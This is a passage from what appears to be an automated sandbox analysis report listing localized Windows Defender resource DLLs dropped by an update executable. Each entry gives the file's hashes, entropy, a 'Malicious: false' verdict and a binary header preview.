SSDEEP:	1536:0HKTJTaf0QqPDQnWSVUE0C4Da1eFSOuHPzhF:0HKTJTaf0QqPDQnWSVUE0C4DaUSOs7
MD5:	B919CA54AC5049ADC843E4FE829C9CD2
SHA1:	39F0DD03AEC56A664ED5DFC6214E2ABF0F9D5842
SHA-256:	34C8D6941EA69F1EF22D732D329CF5809236AB849CFF76A8435AB6B71CA931CA
SHA-512:	B6CD549655FCAEB137A26F190F73781230D513E6957F81049B886BB782490369AC396800539FED0BC7524963CC781D69A8584E25C300932F2F5B43D6B0627521
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................a....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nl-NL\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54520
Entropy (8bit):	4.383460810845868
Encrypted:	false
SSDEEP:	384:7rC8+Ux0xd7DktwBtr1WAtwpj96FfCxEDGJ1aA56Z5w5qoTAZWu+0sW0RDBRJcIF:7rGlfnz5+1dO5wLTAJfeR1Pl
MD5:	2000D01C73693AC55224A2B50B154615
SHA1:	835566F199206A9D25660C4494B06E05CA077D01
SHA-256:	8405E0027C96F98DA781F1E4371574EAC844A6FB11B049E53E0CA6AE3C43C7B6
SHA-512:	DA5DD5E9E577FAFD5461DDC1F3F252C14E76E98C5D0721C9DDD23A32108874903A0222D2057F5FB606069E1B9F6C7996A5EC241185F0C60DAB85A24D5841CBC5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................\|....@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nl-NL\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30440
Entropy (8bit):	4.900201996737871
Encrypted:	false
SSDEEP:	384:7rVAJH6u0XO3abn1r3WS8/WGRDBRJRdyVslGsJw6:7r2J4Mab1UfR1PzcF6
MD5:	4B6F3EF552192457CC7AC7BA263EDD6A
SHA1:	D0AC84BA4D3F530D67214F69C7EABF83805074B9
SHA-256:	8CD88C0931DB658F1D35B8181E38232E44D976D6DF13C52A6D8C02FBCD567905
SHA-512:	234C07C05E39076E1DEC2CB3F865C0107DFD2F238AAEE0219751DE5BDEDCFA4F6C62BF841C308BA0965B418780A349F0832764B98D7115B81B2022DF88F1A0F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T......................................................-.....@.......................................... ...Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc....Q... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..`L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nn-NO\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.062826578318925
Encrypted:	false
SSDEEP:	384:7rMZBnyhELQYN+pEspyol+lzQLXdWS8/WxRDBRJSjlGsuM:7rCnyhELQYNAIoclsLWoR1Pns
MD5:	9AD942027A59B35A699926D89B296612
SHA1:	EFA3FA9C8A2A977931171378AB93C4BFB297CA8F
SHA-256:	1B608279C259B704B85A162C875F1E11AE6019DA7AF62856E9C22F629B840BEC
SHA-512:	8DB6FD5CD62AD29BC98DFB2C76A850FE8622A764DF27100F6982C30C00D546B21D22C667CD5E2CF316DDC6791E2A610EF864CE44DB2C24915FF7D3B10DB37F6F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........J...............................................p......c.....@.......................................... ...F...........L... ...........................................................................................rdata..p...........................@..@.rsrc....F... ...H..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HB...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\or-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	5.468470789271803
Encrypted:	false
SSDEEP:	768:7rLRSFIOOAHXcMN9bqy3NuNFQNTuVl2Js2JOWH2RL5Lwjb3sL8fE9WzPR1PID:RVoTkxtoPHPID
MD5:	3F59C3905C0A227825F4EA3C3E55F091
SHA1:	C3BD4A79118D6C0B7D6A4595330E37CAD96BAA86
SHA-256:	1FB59FD9995DC6CCD4AFEBADAC827E4A14C9325B80A8797E2085B148CB70A4BB
SHA-512:	728A7B4899E4A5B094AF73C007CF113DFBD68FFA9599A0F0A19E5D77629D12112D90E676821264C56782BF36CF3B9F583E70ACC86631F1A6515A7F6F197843CB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........V.......................................................~....@.......................................... ...R...........X... ...........................................................................................rdata..p...........................@..@.rsrc....R... ...T..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hM...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pa-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	5.448358452486155
Encrypted:	false
SSDEEP:	384:7r8Ph0WrdhWjONyKQE38KtTyifWS8/WwRDBRJMwmEy4lGswqWGN:7rUh0WrdhWQQE38qTyzdR1Ply5W
MD5:	9771616F679CFDE87EE5FD215B2EFD9C
SHA1:	AB2596989577EC0388D6E29CE9258D4CFBF763BB
SHA-256:	341C70F942D6DEC043A831790AD82E75550C5CC1F338A93E089538E7EFC94228
SHA-512:	8667DA5D928491DE1B2F2F2EE61539ACE6F9987944766450D5F0DD714D11F5B98331B60A5864D276C17B5F87427A8CD4257D1CBA7C97FFC1E0622D1A4614992E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........V............................................................@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pl-PL\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69368
Entropy (8bit):	4.339106736947339
Encrypted:	false
SSDEEP:	768:7rYv9veOWEtWSKIsZgwbV5VkVpHIWNnWOyAo3HLLLihAWh4aT77aud67DEi4aT4i:ovhRSWh4aT7796PEi4aT4aSST4aGJHPC
MD5:	6CAF1D4CE690539494F539B7905A02BD
SHA1:	B27AEACC46F47EBECF32A88A439D0F4753499A9A
SHA-256:	7285073BE903CC3E47014FA809D64DA01D338A8008FC61843A81DE4471B32217
SHA-512:	B4E52E5435D73061267FF4BD2049937F08E85E11EDCBF8DA71E812460C36F39DE8811DD57E6AC123FB9DFB1ACCC6F9EDAB178DD92CA61FA64384C537DDC4052A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................D.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pl-PL\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.486719064319507
Encrypted:	false
SSDEEP:	1536:SS2bod7w2Wr5xTHwkJokS07ll6qTToeHPH9a:PV8Q
MD5:	61345DAE8DFE5AE0057C8B4A45C2833F
SHA1:	D06F3919D933EA8E1365732334BFD38C706B2CCF
SHA-256:	593AD6B77223468408847298A5884E4BF96D47990838544CB4940FC13EFD8D35
SHA-512:	1BE3BD300686F85282F16C7B9F92781624EBA27C235B1386A6724E04B0EBC0DE44966323034B2A47450BEC32F19BDED3C079E6BC7CA700F14CF84A1F445DA0AA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pl-PL\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.064860853284887
Encrypted:	false
SSDEEP:	768:7rVvwOKNo/vEEU9kUMjt18qtLI099cgR1Px:L8gHPx
MD5:	16DC11F458E24BD57C80E75E96B51784
SHA1:	C45093F886D7A92336B566D3C87C3C2B39724425
SHA-256:	8812A720CBD2BB49D10256A062C1C61C7CF47259693ABC75FB7CD80BFEC5D76F
SHA-512:	01E3F16C6BC48AC1DB7B72D099E774F9C4015B2A812784135BFB2DE2CDE4B0358E6A7D6720F82060F7C106CE8B014C57B973287536620135BE81D43138E0E238
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........R...............................................p.......^....@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HJ...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-BR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64248
Entropy (8bit):	4.210836758533262
Encrypted:	false
SSDEEP:	768:7rPLIoHwex9cxMtOkAq+FRxKIlcEcR1P1a:Eex2WtOhq+T7lcEcHP0
MD5:	9497AC1A8B8DA9EB4149C0F8860C8A89
SHA1:	7003CDAC56EB4DCFBC29B285290142020F696F9A
SHA-256:	76026F20BB91FC672C878D671A313AC10700B4081A57059FA67177AB95159146
SHA-512:	2D9E2DF22E7CE242BE3BF3B0BBC26F91E9375619CA5ED682CEABCE5CBBF490D5E08EE95B3CBCBDF339FDDA1D1E24165807676458814A9312869BD2636BF25DC6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-BR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56552
Entropy (8bit):	4.419046903157761
Encrypted:	false
SSDEEP:	384:7rUnhSmktkGrXihFdOUry+KoK2o4XqPA/UTjGgQpxliKgKYuuXpLxo8NWcSRDBR3:7rEk5tfUMfpL99SR1Pux5G
MD5:	AD8D6A506D4FE7E8DE0C0E9883CBA151
SHA1:	733D6F3B54ED9B4A8449707E9A949AFD9D786040
SHA-256:	29EAEC16675374C3DF48B054B3A15866811F3D265FB7258488B151336E50774A
SHA-512:	7DC01E575ACBE386F2994E00F8BC81D2B2E388FE59B33C477DECFE30979BC4BF00AF1E4F693BC521BEDE41F7EC6D7B333FD9E4FF6F788961BE5F77EE0E069E6F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................m....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-BR\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	5.497802701693256
Encrypted:	false
SSDEEP:	768:7r8K8eM9GZqniX+yvUUS08Ah3gHiyGKIVuzR1Pc7QN:UKFq2d4CKIVuzHPiU
MD5:	FB61ED9BD05B8347B31F73D3B0F798FB
SHA1:	41D0C2F870E50CC2A36BAABB1FFF33ADDC5FE81C
SHA-256:	7976AEC4E0DE7B10D5D038CC42B6412EF877D38CC255132BA388BED3B663D1A9
SHA-512:	34098959957D83F2CDA6BBE7EB2833B048443576D6A30F15DC076E2A784D10C96B660E03F0036298BD08128CD0BD4502086FDD8E649BEB9549704F15D9EF9BEB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................O.....@.......................................... ..8................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-BR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	4.947896350591887
Encrypted:	false
SSDEEP:	384:7r8LukUhOZKY/DA2HAYWS8/W2RDBRJmIrltpBU:7rqALTR1PvBU
MD5:	DE0424196B36FBFE0C64FD8F2B22685D
SHA1:	1EA1BE0F75717F26941F75D61C5AF8209CA754B6
SHA-256:	499EF8CC5E505D5D69B7259B036D510310D834D44F9A5B52E3072471AF7F0A39
SHA-512:	108BB3790F50A69C0C608B8CBE27BB2E36B460D90624A21E8DAD9B827D25ACD45E9483EAF94CBD2D9698158822BA46FED0E13A3F2133DAE3CAC3C04A21D0D64C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........R...............................................p......7.....@.......................................... ...O...........T... ...........................................................................................rdata..p...........................@..@.rsrc....O... ...P..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-PT\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65768
Entropy (8bit):	4.167494107721775
Encrypted:	false
SSDEEP:	1536:pevEPjfPbi+9emR0wdrsxCI7X1Mea5OqHlHPgY:pevEPjfPbi+9emRLRaCMXuhd
MD5:	EDFF30151F7A3372D5224E831C2DB3EF
SHA1:	7089603BB46BBAD596583E059CAE531B72434A0C
SHA-256:	9E94380040D20E1957B31D76004ECBC97939302C097D4FE30902825900FF1CE0
SHA-512:	5C06BEA069BB291C2EAF4544B5FD0E2C10FB8FA0B120B5C104844364E7CD27932F37E49B577A8C880B130964D058EE2ED3938037452677151169BF702D97E9EA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................DH....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-PT\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57080
Entropy (8bit):	4.414886138724662
Encrypted:	false
SSDEEP:	384:7rJYOkXGHgbVbFtqg6gGNjcIEyEBjTUJXBJ4DDqD9wZ/wiluBf4iq4Enr67mtNZs:7rehHYfNqruiNZrPK2R1Phz7Y
MD5:	149D70DD838FCC2AC04DABE7FE40C1FF
SHA1:	E7278BBDF3BE4093D04E6AB10BFDC7956B99DC44
SHA-256:	27CF38D40D339C4469FCDA6D1DBD92A09B5172538656CEC159D0C3D8DCBEA4F0
SHA-512:	760627874A2CD4CC7B5B1EEEFDB91182E24DD403FF5466061757B21D20FC814E517EFEBC0D141065C5FE19C6C90C35BA03E29ED49F9C1925D5420D66CBAFB1C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................o....@.......................................... ..8................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\pt-PT\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.003535806582444
Encrypted:	false
SSDEEP:	384:7rpIX3S3h7OFrK7IzTIDWS8/WeRDBRJA9ghl95Hjy:7riSMvjR1P6gzDy
MD5:	075B782FDC73901B58A099BA2A232A0C
SHA1:	0E1EBFD56684F8135BBA4EED6CA7665622C72AFB
SHA-256:	C14F4A251BF432DAD1E62850F1CEBBB7689E5E50A305FCD6FF396C82426D3D22
SHA-512:	B00598C413F1307E147A476ED289F1982E17F492CFFC3A9EB32489C0B14E11A2F55D9C0E49E913F2A2675E031D1F8233191C16F31A98C05FADE08B28CFE6B231
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........R...............................................p......pz....@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hI...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\quz-PE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	4.970348287912499
Encrypted:	false
SSDEEP:	384:7rpUT8bTXcWbMkXWS8/WJRDBRJQNX7aJdlGslGt:7r+8bTXSkoYR1PQl7aJGf
MD5:	3D89170ECBC32DB0B715C78DF9121B01
SHA1:	6C47FD6322BCF022EFA53E061BCFE0B871A6C99F
SHA-256:	9462D9A0A7A5EA80B399C81A9A654E4CFA358D4994E11BF792D8DB8BB2F0F8E3
SHA-512:	9750E3F61027A9C40EE1255C4AF5F881786E2E63751537162B89929ACB4764D842F04126B341FA725D47D8C8E68BD7E221C2D128CF5B95D76F2FCE24DD363145
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ro-RO\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65768
Entropy (8bit):	4.264145328503549
Encrypted:	false
SSDEEP:	768:7rilOg+iyrUXums3M7t75si5kD+bROCZruaXEitXP7t+KGt8jghhuV+Hk2LFsc6L:QC+s5fThhuV4GiiiDH11bbHPSdTz
MD5:	0328C191B135EECF4E15E3A5D4A4C7AA
SHA1:	321ED6BD7E5B341EF9C157C83C2C760BA5F74FC2
SHA-256:	29B5510FF091C19C95B9A4A563FD6A51890D426092DD15CB0B2CE696F4404EF9
SHA-512:	6547A640222D5050C83FCD0FDC2B36A69FBB1F558613009B74B4F51937740B204E97D869AEB7937C8832BF651BCF5D5791D59AD71950E384888B4D371E4B3042
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................3....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ro-RO\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.032121761927102
Encrypted:	false
SSDEEP:	384:7rDQ+C1kL+OgRWQdEcRPjT32aBiWazCPniyWS8/WlRDBRJDl5GW:7rjSOAdEcRPjT327CPwAR1PSW
MD5:	616C5338172CFE983083D1212627B08E
SHA1:	1128B00D223707DF9770814FA667453C043F7963
SHA-256:	27770C854FF89414B16FBF9B0BAC1080592395AC16FCCF910D666D9DC922621C
SHA-512:	301188B8873FA7737D66B31292A5B13F0C70F69D0B645366CCEF13BB82633B31C3983128B86D6A1FA18554B344CC694C9382F8C28C918958D4A310277FFD7713
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........R...............................................p............@.......................................... ..@O...........T... ...........................................................................................rdata..p...........................@..@.rsrc...@O... ...P..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ru-RU\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66792
Entropy (8bit):	4.695570615657228
Encrypted:	false
SSDEEP:	384:7rz3lMBRJYGHUp8wtVM8xrYXoHE8bl0af619kSG9yvJGNV8GbWxdRDBRJuys4lGW:7rJbKO0dR1PuD58t
MD5:	E83EB650E2482B2C92FDB9F3AB4782A3
SHA1:	8D9C3455B6002F5F35538E3A3971FF768F65B97C
SHA-256:	EAB6A4702D4CD249C79E10302C150BBF39ABAF441F4915773F4D51A8D8FF947E
SHA-512:	71409728F31B5B3157AB48EE9DEEBCC2BC9EBC425BDF99948DC5C2DDFB50C05DADF345BD9B21065C7DB5F025DC880D37E9DDC150A6FF134125878BFED7E68FCE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................R.....@.......................................... ..d................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ru-RU\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57592
Entropy (8bit):	4.87705451786933
Encrypted:	false
SSDEEP:	384:7rKqwbvhMhwBmKVdpZrK/rkfzTWJCRDBRJprhl95:7rKxDIK7rK/rCqCR1P1z
MD5:	A20C3F56787D4A0917087441DACB0F12
SHA1:	C420761334EDE8B253EBA5A0BBEC08E51CEC406E
SHA-256:	994707AE38DAB3F516367E93C8638E0CF70F3D239478A2A3982C88F1A4B5382C
SHA-512:	CF3822086E8CE9BBF19D98B7EA591A41E62D5B0252065C661F8B0B5CD98866AE5E56261173B7618279B1589E2C5F597E0BA5684DDC76862067E273E4C4F48BAA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................L....@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

